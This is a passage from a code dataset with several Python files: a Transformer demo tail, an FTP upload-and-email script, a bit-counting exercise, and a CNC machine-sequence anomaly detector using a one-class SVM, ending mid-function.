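    # The masks are left as None only for this shape-check demo; real training would pass a causal\n    # look-ahead mask, e.g. 1 - tf.linalg.band_part(tf.ones((tar_len, tar_len)), -1, 0).\n    print(fn_out.shape)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Transformer/imp_by_tensorflow20_official/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":13597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"530264602","text":"import ftplib\nimport os\n\n# from sendSMS import *\nfrom sendMail import *\n\n# sendMail(title=\"PLM Crawling success file upload \", text=\"\\n\".join(update_list))\n\ndef ftpupload_file(dir, filename):\n\n    from connection_info import get_connection_info\n\n    # filename = \"OSU1.png\"\n    ftp = ftplib.FTP()\n    ftp.connect(get_connection_info(\"ftp_host\"), int(get_connection_info(\"ftp_port\"))) #Ftp 주소 Connect(주소 , 포트)\n    ftp.login(get_connection_info(\"ftp_id\"), get_connection_info(\"ftp_pw\")) #login (ID, Password)\n    ftp.cwd(get_connection_info(\"ftp_dir\")) #파일 전송할 Ftp 주소 (받을 주소)\n\n\n    #기존 파일 삭제\n    for something in ftp.nlst():\n        # 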
print(\"key:\", filename.split(\".\")[0]+\"_\")\n # if filename.split(\".\")[0]+\"_\" in something:\n if filename == something:\n print(\"Delete old file:\", something)\n ftp.delete(something)\n\n os.chdir(dir) #파일 전송 대상의 주소(보내는 주소)\n # print(os.getcwd())\n myfile = open(filename, 'rb') #Open( ~ ,'r') <= Text파일은 됨, Open( ~ ,'rb') <= 이미지파일 됨\n ftp.storbinary('STOR ' + filename, myfile)\n\n myfile.close()\n ftp.close()\n\n # ftp://223.62.224.35/home\n # C:\\Users\\SKTelecom\\PycharmProjects\\PLM_Crawling\\crawling\\OSU1.png\n\ndef start_upload():\n #마지막 폴더 찾기\n filepath = \"data\"\n lastdate = max([filepath +\"/\"+ f for f in os.listdir(filepath)], key=os.path.getctime)\n abspath = os.path.dirname(os.path.abspath(__file__)) + \"\\/\" + lastdate\n print(lastdate)\n\n file_list = os.listdir(lastdate)\n # print(file_list)\n\n update_list = []\n\n try :\n for file in file_list:\n if file.find(\".csv\") != -1:\n print(\"upload ftp : \" , file)\n ftpupload_file(abspath, file)\n update_list.append(file)\n\n print(update_list)\n except Exception as ex :\n print(ex)\n sendMail(title = \"PLM Crawling Error occurred, ftpupload_file \", text = ex.__str__())\n exit(-1)\n\n last_dt = lastdate.split(\"/\")[1]\n files = []\n files.append(f\"plm_swver_DataWarehouse_{last_dt}.xls\")\n sendMail(title=\"PLM Crawling success file upload \", text=\"\\n\".join(update_list), files=files)\n\n return file_list\n\n\n## Start\nif __name__ == \"__main__\":\n # from sendMail import *\n # sendMail(\"jungil.kwon@sk.com\")\n # filepath = \"data\"\n # lastdate = max([filepath + \"/\" + f for f in os.listdir(filepath)], key=os.path.getctime)\n # # lastdir = list(reversed([\"data/\" + f for f in os.listdir(\"data\") if not \".\" in f]))[0]\n # print(lastdate)\n\n start_upload()\n\n","sub_path":"crawling/ftpupload.py","file_name":"ftpupload.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"597603151","text":"import sys\r\n\r\ndef max(a,b):\r\n return a if a>b else b\r\n\r\nn = int(input().strip())\r\n\r\nmax_num = 0\r\n# Changed from 'n' to '0'\r\ncount = 0\r\n\r\nwhile n:\r\n # changed from 'n&2' to 'n&1' \r\n while n&1:\r\n count += 1\r\n n>>=1\r\n max_num = max(count, max_num)\r\n if not n&1:\r\n count = 0\r\n # changed from 'n>>=2' to 'n>>=1' \r\n n>>=1\r\n\r\nprint(\"Maximum consecutive 1 in binary:\", max_num)","sub_path":"Binary/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"50818252","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom bisect import *\nfrom sklearn import preprocessing\nfrom sklearn.cluster import DBSCAN\nimport datetime\nimport re\nimport os\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.externals import joblib\n\npd.set_option('display.max_row', 1000)\n# Set iPython's max column width to 50\npd.set_option('display.max_columns', 500)\npd.set_option('expand_frame_repr', False)\npd.options.mode.chained_assignment = None\n\n\ndef replace_outlier(series):\n median = np.median(series)\n std = np.std(series)\n minvalue = median - 3 * std\n maxvalue = median + 3 * std\n for item in series:\n if item < minvalue or item > maxvalue:\n series = series.replace(item, median)\n return series\n\n\ndef remove_rarevalue(series, threshold=1):\n \"\"\"\n simple 
function for removing some rare values (whose frequency is less than a threshold)\n :param threshold:\n :param series:\n :return:\n \"\"\"\n counts = series.value_counts()\n series = series[series.isin(counts[counts > threshold].index)]\n return series\n\n\ndef read_sequence(company):\n \"\"\"\n read sequence and add a last sequence caracteristic\n :param company:\n :return:\n \"\"\"\n sequences = pd.read_csv(company + '/sequence.csv', low_memory=True)\n sequences['lastsequence'] = sequences['sequenceid']\n prev = sequences.iloc[0]\n for index, item in sequences.iterrows():\n if index == 0:\n continue\n if item['operationid'] != prev['operationid']:\n sequences.loc[index - 1, 'lastsequence'] = 1\n prev = item\n continue\n sequences.loc[index - 1, 'lastsequence'] = 0\n prev = item\n sequences.loc[sequences.index[-1], 'lastsequence'] = 1\n # sequences.to_csv(company + '/newsequence.csv')\n\n return sequences\n\n\ndef is_stop_sequence(company, sequenceid):\n sequences = pd.read_csv(company + '/sequence.csv')\n a = sequences[sequences['sequenceid'] == sequenceid]\n if len(a) > 0:\n a.index = range(len(a))\n kind = a['sequencekind'].loc[0]\n return kind == 'Stop'\n return True\n\n\ndef read_sequenceslot(company):\n \"\"\"\n read and preprocess the sequence slots of a company\n preprocess:\n * remove the sequence slots without sequence id\n * calculate the duration and pause time\n *\n :param company:\n :return:\n \"\"\"\n\n sequenceslots = pd.read_csv(company + '/sequenceslot.csv', low_memory=True)\n sequenceslots = pd.DataFrame(sequenceslots)[\n ['sequenceid', 'machinemoduleid', 'sequenceslotbegin', 'sequenceslotend', 'sequenceslotnextbegin']]\n # remove the sequences without sequenceid\n sequenceslots = sequenceslots.dropna()\n\n sequenceslots['sequenceslotend'] = pd.to_datetime(sequenceslots['sequenceslotend'])\n sequenceslots['sequenceslotbegin'] = pd.to_datetime(sequenceslots['sequenceslotbegin'])\n sequenceslots['sequenceslotnextbegin'] = pd.to_datetime(sequenceslots['sequenceslotnextbegin'])\n\n sequenceslots['sequenceduration'] = (sequenceslots['sequenceslotend'] - sequenceslots[\n 'sequenceslotbegin']) / np.timedelta64(1, 's')\n sequenceslots['pausetime'] = (sequenceslots['sequenceslotnextbegin'] - sequenceslots[\n 'sequenceslotend']) / np.timedelta64(1, 's')\n return sequenceslots.sort_values(by='sequenceslotbegin')\n\n\ndef analyse_sequence(sequenceslots, sequenceid):\n \"\"\"\n give statistics of a given sequence (sequence id)\n :param sequenceslots:\n :param sequenceid:\n :return:\n \"\"\"\n\n def validate(series):\n def count_items_interval(serie, minimum, maximum):\n \"\"\"\n :param serie:\n :param minimum:\n :param maximum:\n :return:\n \"\"\"\n count = 0\n for val in serie:\n if minimum <= val <= maximum:\n count += 1\n return count / len(serie) * 100.00\n\n \"\"\"\n Settings:\n 1. threshold: how many examples are needed to analyse a sequence?\n 2. 
choose a reasonable interval: mean +- 2s or median +- 2s (sampling interval: 2s)\n        :param series:\n        :return:\n        0: abnormal sequence\n        1: normal sequence\n        2: insufficient example\n        \"\"\"\n        if len(series) > 200:\n            print('Items analysed: ' + str(len(series)))\n            mode = series.mode()\n            median = series.median()\n            if len(mode) == 0:\n                mode = [median]\n            interval = (min(mode[0], median) - 2, max(mode[0], median) + 2)\n            print('Interval : ' + str(interval[0]) + ' ~ ' + str(interval[1]))\n            print(str(count_items_interval(series, interval[0], interval[1])) + '% of items are in this interval.')\n            modevalues = ''\n            for value in mode:\n                modevalues += str(value) + ', '\n            print('Mode value: ' + modevalues)\n            print('Median: ' + str(series.median()))\n            print('\\n')\n\n            if count_items_interval(series, interval[0], interval[1]) < 70:\n                print('Abnormal sequence!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n                return 0\n            else:\n                return 1\n        print('insufficient example!\\n')\n        return 2\n\n    sequence_specifique = sequenceslots[sequenceslots['sequenceid'] == sequenceid].copy()\n    machinemodules = sequence_specifique['machinemoduleid'].unique()\n    abnormal_list = []\n    normal_list = []\n    insufficient_count = 0\n    for machinemodule in machinemodules:\n        print('Analysis of sequence ' + str(sequenceid) + ' with machine module ' + str(machinemodule))\n        machinemodule_subset = sequence_specifique[sequence_specifique['machinemoduleid'] == machinemodule]\n        duration_column = machinemodule_subset['sequenceduration'].copy()\n        validate_value = validate(duration_column)\n        if validate_value == 0:\n            abnormal_list.append([sequenceid, machinemodule])\n        if validate_value == 1:\n            normal_list.append([sequenceid, machinemodule])\n        if validate_value == 2:\n            insufficient_count += 1\n\n    return abnormal_list, insufficient_count, normal_list\n\n\ndef classify_sequences(company):\n    sequenceslots = read_sequenceslot(company)\n    totalsequences = sequenceslots['sequenceid'].unique()\n    abnormal_sequences = []\n    insufficient_example = 0\n    normal_sequences = []\n    for sequence in totalsequences:\n        if is_stop_sequence(company, sequence):\n            continue\n        return_values = analyse_sequence(sequenceslots, sequence)\n        abnormal_sequences += return_values[0]\n        insufficient_example += return_values[1]\n        normal_sequences += return_values[2]\n    with open(company + '/abnormal.bin', 'wb') as abnormal:\n        pickle.dump(abnormal_sequences, abnormal)\n    with open(company + '/normal.bin', 'wb') as normal:\n        pickle.dump(normal_sequences, normal)\n    print(abnormal_sequences)\n    print('found ' + str(len(abnormal_sequences)) + ' abnormal sequences among ' + str(\n        len(totalsequences) - insufficient_example) + ' analysed sequences.')\n\n\ndef clean_featurematrix(feature_matrix, company):\n    def find_average(value_list):\n        # missing value\n        if len(value_list) == 0:\n            return np.nan\n        sum_value = 0\n        sum_time = 0\n        for item in value_list:\n            sum_value += float(item[0]) * float(item[1])\n            sum_time += float(item[1])\n        if sum_time == 0:\n            return 0\n        return sum_value / sum_time\n\n    def find_machinemode(value_list):\n\n        \"\"\"\n        10 stands for active\n        0 stands for inactive\n        for the missing value: probably active\n        reason: many missing values are not really missing. there exist some long-time records (from October 1st\n        to October 5th). In this situation the slots in the 4th cannot find a corresponding record in the exact\n        date. Their records are in the October 1st file. Generally, the values of long-time records are normal.\n        That's to say, for machine mode: active; for override value: 100%. 
This is the reason why I fill the\n        missing value with 10 for machine mode and 100 for override value.\n\n        In addition, it's necessary to enrich the machine mode processing for more complicated hierarchical systems.\n        (fanuc machine mode?)\n        :param value_list:\n        :return:\n        \"\"\"\n        if len(value_list) == 0:\n            return 10\n        sum_value = 0\n        sum_time = 0\n        for item in value_list:\n            # 3 or 2 are both active machine mode\n            if (int(item[0]) == 3) or (int(item[0]) == 2):\n                sum_value += 10 * float(item[1])\n                sum_time += float(item[1])\n\n            elif int(item[0]) == 1:\n                sum_value += 0 * float(item[1])\n                sum_time += float(item[1])\n            else:\n                return -100  # manual operation\n        if sum_time == 0:\n            return 10\n        return sum_value / sum_time\n\n    def find_average_override(value_list):\n        # missing value\n        if len(value_list) == 0:\n            return 100\n        sum_value = 0\n        sum_time = 0\n        for item in value_list:\n            sum_value += float(item[0]) * float(item[1])\n            sum_time += float(item[1])\n        if sum_time == 0:\n            return 100\n        return sum_value / sum_time\n\n    def find_hold(value_list):\n        if len(value_list) == 0 or value_list[0] == 'False':\n            return 0\n        return 1  # Hold operation exists\n\n    def find_time(begin_timestamp):\n        begin_time = begin_timestamp.time()\n        midnight = datetime.time(0, 0, 0)\n        eight = datetime.time(8, 0, 0)\n        sixteen = datetime.time(16, 0, 0)\n        if midnight <= begin_time < eight:\n            return 1  # night\n        if eight <= begin_time < sixteen:\n            return 2  # day\n        if sixteen <= begin_time:\n            return 3  # evening\n        return 0  # unknown\n\n    def find_idletime_ratio(value_list):\n        \"\"\"\n        ratio of idle time to total time (motion + idle) within the slot\n        :param value_list:\n        :return:\n        \"\"\"\n        if len(value_list) == 0:\n            return np.nan\n        motiontime = 0\n        idletime = 0\n        for item in value_list:\n            item[0] = str(item[0])\n            if item[0].find('Motion') != -1 or item[0].find('ACTIVE') != -1 or item[0].find('Dwell') != -1:\n                motiontime += float(item[1])\n            else:\n                idletime += float(item[1])\n        return idletime / (motiontime + idletime + 0.01)\n\n    def find_changetimes(value_list):\n        if len(value_list) == 0:\n            return np.nan\n        else:\n            return len(value_list)\n\n    def find_nonstop114(value_list):\n        if len(value_list) == 0:\n            return True\n        for item in value_list:\n            item[0] = str(item[0])\n            if 'Start' not in item[0] and 'ACTIVE' not in item[0]:\n                return False\n        return True\n\n    def find_nonstop181(value_list):\n        if len(value_list) == 0:\n            return True\n\n        for item in value_list:\n            item[0] = str(item[0])\n            if 'ACTIVE' not in item[0] and 'READY' not in item[0]:\n                return False\n        return True\n\n    def find_memory_prop190(value_list):\n        if len(value_list) == 0:\n            return 100\n        memory_time = 0\n        total_time = 0\n        for item in value_list:\n            if str(item[0]) == 'Memory':\n                memory_time += float(item[1])\n                total_time += float(item[1])\n            else:\n                total_time += float(item[1])\n        return memory_time / (total_time+0.01)\n\n    def find_start_prop191(value_list):\n        if len(value_list) == 0:\n            return 100\n        memory_time = 0\n        total_time = 0\n        for item in value_list:\n            if str(item[0]) == 'Start':\n                memory_time += float(item[1])\n                total_time += float(item[1])\n            else:\n                total_time += float(item[1])\n        return memory_time / (total_time+0.01)\n\n    def find_motion_prop192(value_list):\n        if len(value_list) == 0:\n            return 100\n        memory_time = 0\n        total_time = 0\n        for item in value_list:\n            if str(item[0]) == 'Motion':\n                memory_time += float(item[1])\n                total_time += float(item[1])\n            else:\n                total_time += float(item[1])\n        return memory_time / (total_time+0.01)\n\n    def find_Auto_prop180(value_list):\n        if len(value_list) == 0:\n            return 100\n        memory_time = 0\n        total_time 
= 0\n for item in value_list:\n if str(item[0]) == 'AUTOMATIC':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def find_Active_prop181(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'ACTIVE':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def is_normal(duration, interval_list):\n for interval in interval_list:\n if interval[0] <= duration <= interval[1]:\n return 1\n return 0\n\n def find_confidenceinterval_from_filter(sequenceslots):\n normal_slots = sequenceslots[(sequenceslots['feedrateoverride'] > 95) & (sequenceslots['machinemode'] > 9.5)\n & (sequenceslots['rapidtraverseoverride'] > 95)]\n return find_confidence_interval(normal_slots['sequenceduration'])\n\n def calculate_duration(sequenceslot, sequenceslots):\n sequenceid = sequenceslot['sequenceid']\n if len(sequenceslots[sequenceslots['sequenceid'] == sequenceid]['lastsequence']) == 0:\n return sequenceslot['sequenceduration'] + sequenceslot['pausetime']\n if sequenceslots[sequenceslots['sequenceid'] == sequenceid]['lastsequence'].item() == 0:\n return sequenceslot['sequenceduration'] + sequenceslot['pausetime']\n return sequenceslot['sequenceduration']\n\n feature_matrix['pausetime'] = pd.to_numeric(feature_matrix['pausetime'])\n feature_matrix['sequenceduration'] = pd.to_numeric(feature_matrix['sequenceduration'])\n feature_matrix['sequenceid'] = pd.to_numeric(feature_matrix['sequenceid'])\n feature_matrix['machinemoduleid'] = pd.to_numeric(feature_matrix['machinemoduleid'])\n feature_matrix['sequenceslotbegin'] = pd.to_datetime(feature_matrix['sequenceslotbegin'])\n feature_matrix['sequenceslotend'] = pd.to_datetime(feature_matrix['sequenceslotend'])\n feature_matrix['addition'] = feature_matrix['sequenceduration'] + feature_matrix['pausetime']\n '''\n std1 = np.std(remove_rarevalue(feature_matrix['sequenceduration'], 1))\n std2 = np.std(remove_rarevalue(feature_matrix['addition'], 1))\n if std2 < std1:\n feature_matrix['sequenceduration'] = feature_matrix['addition']\n '''\n # remove different day sequence slots\n feature_matrix['beginday'] = feature_matrix['sequenceslotbegin'].apply(lambda x: x.date())\n feature_matrix['endday'] = feature_matrix['sequenceslotend'].apply(lambda x: x.date())\n feature_matrix['sameday'] = feature_matrix['beginday'] == feature_matrix['endday']\n feature_matrix = feature_matrix[feature_matrix['sameday'] == True]\n\n # remove hold operation\n feature_matrix['hold'] = feature_matrix[115].apply(find_hold)\n # feature_matrix = feature_matrix[feature_matrix['hold'] == 0]\n\n # remove manual operation\n feature_matrix['machinemode'] = feature_matrix['machinemode'].apply(find_machinemode)\n # feature_matrix = feature_matrix[feature_matrix['machinemode'] >= 0]\n\n # remove program stop sequence slot\n feature_matrix['nonstop114'] = feature_matrix[114].apply(find_nonstop114)\n feature_matrix['nonstop181'] = feature_matrix[181].apply(find_nonstop181)\n # feature_matrix = feature_matrix[(feature_matrix['nonstop114'] == True) & (feature_matrix['nonstop181'] == True)]\n\n feature_matrix['averagefeedrate'] = feature_matrix[100].apply(find_average)\n feature_matrix['averagespindlespeed'] = feature_matrix[101].apply(find_average)\n feature_matrix['averagespindleload'] = feature_matrix[102].apply(find_average)\n 
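# note (summary of the helpers above, not part of the original file): fields 100-102\n    # (feed rate, spindle speed/load) use a time-weighted average and yield NaN when no\n    # CNC record overlaps the slot, while the override fields below (103-105) fall back\n    # to 100, following the missing-value reasoning in find_machinemode's docstring\n    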
feature_matrix['feedrateoverride'] = feature_matrix[103].apply(find_average_override)\n feature_matrix['spindlespeedoverride'] = feature_matrix[104].apply(find_average_override)\n feature_matrix['rapidtraverseoverride'] = feature_matrix[105].apply(find_average_override)\n feature_matrix['rapidtraverserate'] = feature_matrix[108].apply(find_average)\n feature_matrix['averagefeedrateus'] = feature_matrix[111].apply(find_average)\n feature_matrix['averagerapidtraverseus'] = feature_matrix[113].apply(find_average)\n feature_matrix['spindlespeedchangetimes'] = feature_matrix[101].apply(find_changetimes)\n feature_matrix['sequenceTime'] = feature_matrix['sequenceslotbegin'].apply(find_time)\n feature_matrix['idleTimeRatio'] = feature_matrix[114].apply(find_idletime_ratio)\n feature_matrix['ratioFeedrateSpindlespeed'] = np.log(\n feature_matrix['averagefeedrate'] / (feature_matrix['averagespindlespeed'] + 0.1))\n feature_matrix['ratioFeedrateSpindlespeedus'] = np.log(\n feature_matrix['averagefeedrateus'] / (feature_matrix['averagespindlespeed'] + 0.1))\n\n feature_matrix['memory_prop'] = feature_matrix[190].apply(find_memory_prop190)\n feature_matrix['start_prop'] = feature_matrix[191].apply(find_start_prop191)\n feature_matrix['motion_prop'] = feature_matrix[192].apply(find_motion_prop192)\n feature_matrix['auto_prop'] = feature_matrix[180].apply(find_Auto_prop180)\n feature_matrix['active_prop'] = feature_matrix[181].apply(find_Active_prop181)\n\n '''\n durations = pd.DataFrame([\n\n feature_matrix['feedrateoverride'],\n feature_matrix['machinemode'],\n feature_matrix['rapidtraverseoverride'],\n ])\n\n durations.replace([np.inf, -np.inf], np.nan, inplace=True)\n durations.fillna(durations.median(), inplace=True)\n durations.fillna(0, inplace=True)\n durations = durations.as_matrix()\n\n durations = np.array(list(zip(durations[0], durations[1], durations[2])))\n durations = preprocessing.StandardScaler().fit_transform(durations)\n db = DBSCAN(eps=0.05, min_samples=25).fit(durations)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n\n feature_matrix['normal'] = feature_matrix['sequenceduration'] * 0\n feature_matrix.loc[core_samples_mask, 'normal'] = 1\n\n normal_slots = feature_matrix[feature_matrix['normal'] == 1]\n if len(normal_slots) == 0:\n print('***** no cluster found! *****')\n return None\n\n duration1, prop1 = find_standard_duration(normal_slots['sequenceduration'])\n duration2, prop2 = find_standard_duration(normal_slots['addition'])\n if duration2 > 0 and prop2 >= prop1:\n standard_duration = duration2\n feature_matrix['sequenceduration'] = feature_matrix['addition']\n elif duration1 > 0 and prop1 >= prop2:\n standard_duration = duration1\n else:\n print('***** no effective cluster found! 
*****')\n return None\n\n interval = [[0, standard_duration + 2]]\n print('interval found: ' + str(interval))\n '''\n interval = find_confidenceinterval_from_filter(feature_matrix)\n feature_matrix['normal'] = feature_matrix['sequenceduration'].apply(is_normal, args=(interval,))\n\n # feature chosen\n learning_matrix = feature_matrix[[\n 'hold', 'nonstop114', 'nonstop181',\n # 'memory_prop', 'start_prop', 'auto_prop', 'active_prop',\n 'feedrateoverride', 'rapidtraverseoverride',\n\n\n 'machinemode',\n 'sequenceduration', 'pausetime', 'sequenceid', 'normal']]\n\n #print(learning_matrix[learning_matrix['normal'] == 0].sort_values(by='sequenceduration'))\n #print(learning_matrix[learning_matrix['normal'] == 1].sort_values(by='sequenceduration'))\n\n '''\n learning_matrix = feature_matrix[['averagefeedrate', 'averagespindlespeed', 'averagespindleload',\n 'feedrateoverride', 'rapidtraverseoverride',\n 'spindlespeedoverride', 'averagefeedrateus',\n 'machinemode',\n 'sequenceduration', 'pausetime', 'sequenceid', 'normal']]\n '''\n learning_matrix.replace([np.inf, -np.inf], np.nan, inplace=True)\n learning_matrix.fillna(learning_matrix.median(), inplace=True)\n learning_matrix.fillna(0, inplace=True)\n\n features = learning_matrix.copy()\n del features['sequenceduration']\n del features['pausetime']\n del features['sequenceid']\n del features['normal']\n\n targets = pd.Series(learning_matrix['sequenceduration'], name='sequenceduration')\n targets2 = pd.Series(learning_matrix['normal'], name='normal')\n '''\n normal = learning_matrix[learning_matrix['normal'] == 1]\n if len(normal) > 50:\n sns.distplot(remove_rarevalue(normal['sequenceduration'], 0))\n plt.figure()\n sns.distplot(remove_rarevalue((normal['sequenceduration'] + normal['pausetime']), 0))\n plt.show()\n '''\n\n return pd.concat([features, targets, targets2], axis=1)\n\n\n# noinspection PyTypeChecker\ndef get_matrix_for_machinemodule(company, machinemoduleid):\n matrix_list = []\n for root, dire, files in os.walk(company + '/matrices/machinemodule' + str(machinemoduleid)):\n if len(files) >= 1:\n for file in files:\n with open(company + '/matrices/machinemodule' + str(machinemoduleid) + '/' + file, 'rb') as matfile:\n mat = pickle.load(matfile)\n matrix_list.append(clean_featurematrix(mat, company))\n final_matrix = pd.concat(matrix_list)\n final_matrix.index = range(len(final_matrix))\n generate_model(final_matrix)\n\n\ndef calculate_fscore(true_normal, false_normal, true_alert, false_alert):\n precision1 = true_normal / (true_normal + false_normal + 0.01)\n recall1 = true_normal / (true_normal + false_alert + 0.01)\n precision2 = true_alert / (true_alert + false_alert + 0.01)\n recall2 = true_alert / (true_alert + false_normal + 0.01)\n point1 = 2 * precision1 * recall1 / (precision1 + recall1 + 0.01)\n point2 = 2 * precision2 * recall2 / (precision2 + recall2 + 0.01)\n return (point1 + point2) / 2\n\n\ndef generate_model(learning_matrix):\n def oneclasssvm_score_normal(normalresults):\n index = 0\n count = 0\n while index < len(normalresults):\n if normalresults[index] == 1:\n count += 1\n index += 1\n return count, len(normalresults) - count\n\n def oneclasssvm_score_abnormal(abnormalresults):\n index = 0\n count = 0\n while index < len(abnormalresults):\n if abnormalresults[index] == -1:\n count += 1\n index += 1\n return count, len(abnormalresults) - count\n\n scaler = preprocessing.StandardScaler()\n\n nuset = np.linspace(0.001, 0.3, num=5)\n gammaset = np.linspace(0.0001, 3, num=5)\n print('********* BEGIN *********')\n 
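# data split used below: normal slots -> 80% train/CV pool, 20% held-out test;\n    # abnormal slots -> 50% CV, 50% test; the (nu, gamma) grid search keeps the\n    # one-class SVM with the best F-score averaged over the shuffled CV runs\n    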
normalslots = learning_matrix[learning_matrix['normal'] == 1].copy()\n    abnormalslots = learning_matrix[learning_matrix['normal'] == 0].copy()\n\n    learning_matrix_copy = learning_matrix.copy()\n    del learning_matrix_copy['sequenceduration']\n    del learning_matrix_copy['normal']\n    scaler.fit_transform(learning_matrix_copy)\n\n    featuresnormal = normalslots.copy()\n    del featuresnormal['sequenceduration']\n    del featuresnormal['normal']\n\n    featuresabnormal = abnormalslots.copy()\n    del featuresabnormal['sequenceduration']\n    del featuresabnormal['normal']\n\n    if len(featuresabnormal) < 2 or len(featuresnormal) < 2:\n        print('***** insufficient examples! *****')\n        return 2\n\n    features_scaled_normal = scaler.transform(featuresnormal)\n    features_scaled_abnormal = scaler.transform(featuresabnormal)\n\n    rest_normal = features_scaled_normal[0:int(0.8 * len(features_scaled_normal))]\n    test_normal = features_scaled_normal[int(0.8 * len(features_scaled_normal)):]\n\n    cv_abnormal = features_scaled_abnormal[0:int(0.5 * len(features_scaled_abnormal))]\n    test_abnormal = features_scaled_abnormal[int(0.5 * len(features_scaled_abnormal)):]\n\n    print('****** Cross Validation ********')\n    pointmax = 0\n    nuoptimal = 0\n    gammaoptimal = 0\n    clfoptimal = None\n    for nu in nuset:\n        for gamma in gammaset:\n            clf = svm.OneClassSVM(nu=nu, kernel=\"rbf\", gamma=gamma)\n            point_count = 0\n            iterations = range(1, 3)\n            for _ in iterations:\n                rest_normal_copy = rest_normal.copy()\n                np.random.shuffle(rest_normal_copy)\n                training_normal = rest_normal_copy[0:int(0.8 * len(rest_normal_copy))]\n                cv_normal = rest_normal_copy[int(0.8 * len(rest_normal_copy)):]\n                clf.fit(training_normal)\n\n                normal_results = clf.predict(cv_normal)\n                abnormal_results = clf.predict(cv_abnormal)\n                true_normal, false_alert = oneclasssvm_score_normal(normal_results)\n                true_alert, false_normal = oneclasssvm_score_abnormal(abnormal_results)\n                # print('nu = ' + str(nu) + ' gamma = ' + str(gamma))\n                point = calculate_fscore(true_normal, false_normal, true_alert, false_alert)\n                # print(point)\n                point_count += point\n            pointfinal = point_count / len(iterations)\n            if pointfinal > pointmax:\n                pointmax = pointfinal\n                nuoptimal = nu\n                gammaoptimal = gamma\n                clfoptimal = clf\n\n    print('********************************************')\n    print('nuoptimal: ' + str(nuoptimal) + ', gammaoptimal: ' + str(gammaoptimal))\n    print('point final: ' + str(pointmax))\n\n    print('*********** Test *************')\n    clffinal = clfoptimal\n    normal_results_final = clffinal.predict(test_normal)\n    abnormal_results_final = clffinal.predict(test_abnormal)\n    true_normal, false_alert = oneclasssvm_score_normal(normal_results_final)\n    true_alert, false_normal = oneclasssvm_score_abnormal(abnormal_results_final)\n    y_pred = [1] * true_normal + [0] * false_alert + [0] * true_alert + [1] * false_normal\n    y_true = [1] * true_normal + [1] * false_alert + [0] * true_alert + [0] * false_normal\n    print(confusion_matrix(y_true, y_pred))\n    print(classification_report(y_true, y_pred))\n\n    point = calculate_fscore(true_normal, false_normal, true_alert, false_alert)\n    print(point)\n    print('********** END ********** \\n\\n')\n    return point\n\n\n# noinspection PyTypeChecker\ndef analyse_specifique_sequence_ocsvm(sequenceslots, sequenceid, machinemoduleid, company):\n    analyse_sequence(sequenceslots, sequenceid)\n    filename = company + '/matrices/machinemodule' + str(machinemoduleid) + '/matrix' + str(\n        sequenceid) + 'machinemodule' + str(machinemoduleid) + '.mat'\n    with open(filename, 'rb') as data:\n        feature_matrix = 
pickle.load(data)\n    learning_matrix = clean_featurematrix(feature_matrix, company)\n    if learning_matrix is not None:\n        point = generate_model(learning_matrix)\n        if point > 0.7:\n            return 1\n    return 0\n\n\ndef draw_distribution_curve(sequenceslots, sequenceid, machinemoduleid):\n    sequence_specifique = sequenceslots[(sequenceslots['sequenceid'] == sequenceid) &\n                                        (sequenceslots['machinemoduleid'] == machinemoduleid)]\n    duration_column = sequence_specifique['sequenceduration']\n    duration_column = remove_rarevalue(duration_column, 2)\n    plt.figure()\n    plt.title('sequence ' + str(sequenceid) + ', machinemodule ' + str(machinemoduleid))\n    sns.distplot(duration_column, kde=True)\n\n\ndef find_cnc_value(cnc_values, fieldid, sequenceslot):\n    # the bottleneck is here!!!!!!!!!!!!\n    field_values = cnc_values[\n        (cnc_values['fieldid'] == fieldid) & (cnc_values['machinemoduleid'] == sequenceslot['machinemoduleid'])]\n    field_values = field_values.sort_values(by='cncvaluebegindatetime')\n    field_values.index = range(len(field_values))\n    slot_begintime = sequenceslot['sequenceslotbegin']\n    slot_endtime = sequenceslot['sequenceslotend']\n    value_list = []\n    position = bisect_right(field_values['cncvaluebegindatetime'], slot_begintime)\n    if position == 0:\n        return []\n    if position == len(field_values):\n        return value_list\n    cncendtime = field_values.loc[position - 1]['cncvalueenddatetime']\n    if cncendtime > slot_begintime:\n        if slot_endtime < cncendtime:\n            time = (slot_endtime - slot_begintime) / np.timedelta64(1, 's')\n        else:\n            time = (cncendtime - slot_begintime) / np.timedelta64(1, 's')\n        value_list.append([field_values.loc[position - 1]['cncvaluestring'], time])\n\n    while slot_endtime > field_values.loc[position]['cncvaluebegindatetime']:\n        cncbegintime = field_values.loc[position]['cncvaluebegindatetime']\n        cncendtime = field_values.loc[position]['cncvalueenddatetime']\n        if slot_endtime < cncendtime:\n            time = (slot_endtime - cncbegintime) / np.timedelta64(1, 's')\n        else:\n            time = (cncendtime - cncbegintime) / np.timedelta64(1, 's')\n        value_list.append([field_values.loc[position]['cncvaluestring'], time])\n        position += 1\n        if position > len(field_values) - 1:\n            break\n    return value_list\n\n\ndef find_machineid(machinemoduleid, company):\n    machinemodule = pd.read_csv(company + '/machinemodule.csv')\n    a = machinemodule[machinemodule['machinemoduleid'] == machinemoduleid]\n    a.index = range(len(a))\n    return a['machineid'].loc[0]\n\n\ndef find_fact(facts, sequenceslot, company):\n    machineid = find_machineid(sequenceslot['machinemoduleid'], company)\n    facts = facts[facts['machineid'] == machineid]\n    facts = facts.sort_values(by='factbegindatetime')\n    facts.index = range(len(facts))\n    slot_begintime = sequenceslot['sequenceslotbegin']\n    slot_endtime = sequenceslot['sequenceslotend']\n    value_list = []\n    position = 